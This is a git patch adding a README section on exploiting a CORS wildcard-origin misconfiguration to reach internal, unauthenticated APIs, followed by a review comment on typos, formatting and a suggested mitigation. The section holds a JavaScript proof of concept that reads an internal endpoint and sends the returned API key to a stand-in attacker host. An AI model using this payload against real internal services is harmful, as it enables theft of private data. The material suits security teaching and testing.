From 3e5b36722418cba19b02abd751ab08160dcb43e5 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Sun, 12 Apr 2020 15:06:28 +0200 Subject: [PATCH] Added CORS Exploit when wildcard origin is allowed --- CORS Misconfiguration/README.md | 35 +++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index d7d9f95..8d9af8b 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -128,6 +128,41 @@ again. https://trusted-origin.example.com/?xss= ``` +### Vulnerable Example: Wildcard Origin `*` without Credentials + +If the server responds with a wildcard origin `*`, the browser does never send +the cookies. Howver, if the server does not require authentication, it's still +possible to access the data on the server. This can happen on internal servers +that are not accessible from the Internet. The attacker's website can then +pivot into the internal network and access the server's data withotu +authentication. + +#### Vulnerable Implementation + +```powershell +GET /endpoint HTTP/1.1 +Host: api.internal.example.com +Origin: https://evil.com + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: * + +{"[private API key]"} +``` + +#### Proof of concept + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://api.internal.example.com/endpoint',true); +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + ## Bug Bounty reports * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
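Review bot: the new README section has several typos that should be fixed before merge: "Howver" should read "However", "withotu" should read "without", "the browser does never send the cookies" should read "the browser never sends the cookies", and the proof of concept exfiltrates to "atttacker.net", which should be "attacker.net". The request/response listing under "Vulnerable Implementation" is fenced as ```powershell although it is an HTTP exchange, so tag it ```http (or leave it untagged); the response body `{"[private API key]"}` is also not valid JSON, and `{"key": "[private API key]"}` would read more clearly. The section explains the risk well but stops short of the fix: a one-line mitigation would round it out, e.g. "`Access-Control-Allow-Origin: *` is only acceptable for resources that are genuinely public; internal or unauthenticated endpoints that return sensitive data should respond only to an allowlisted origin or omit the header entirely." Minor: in the JavaScript snippet the trailing `};` after the `reqListener` function declaration is an empty statement and can be dropped, and `const` is preferable to `var` for both bindings.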